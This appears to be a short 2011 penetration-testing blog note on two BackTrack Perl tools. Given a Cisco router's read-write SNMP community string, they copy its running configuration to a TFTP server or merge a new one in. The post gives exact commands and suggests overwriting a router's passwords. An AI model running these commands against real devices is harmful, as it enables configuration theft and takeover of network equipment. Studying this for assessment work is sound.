Friday, December 2, 2011

copy-router-config / merge-router-config

Vulnerability Assessment -> Network Assesstment -> Cisco Tools

This tool is good for copying a Cisco router's running configuration with SNMP to a TFTP server, if we have the RW community string. This can be discovered for example with the Cisco Auditing Tool. My TFTP server is running on  the Backtrack machine.

Usage:

chmod 777 copy-router-config.pl <- By default we don't have permission to run it, so give ourselves permission.

root@bt:/pentest/cisco/copy-router-config# ./copy-router-config.pl 192.168.80.137 192.168.80.128 private

The first IP is the router, the second is the TFTP server. The configuration is saved to a file called "pwnd-router.config".

The pair of this tool is the merge-router-config.pl. This can copy a config file to the  router's running config. Its usage is similar:

chmod 777 merge-router-config.pl <- Again, by default we don't have permission to run it, so give ourselves permission.

root@bt:/pentest/cisco/copy-router-config# ./merge-router-config.pl 192.168.80.137 192.168.80.128 private

The first IP is the router, the second is the TFTP server. The configuration is copied from a file called "pwnd-router.config".

This can be good to change the passwords on a router, by overwriting its configuration.


The Cisco router configuration related to this, is:

snmp-server community private RW

No comments: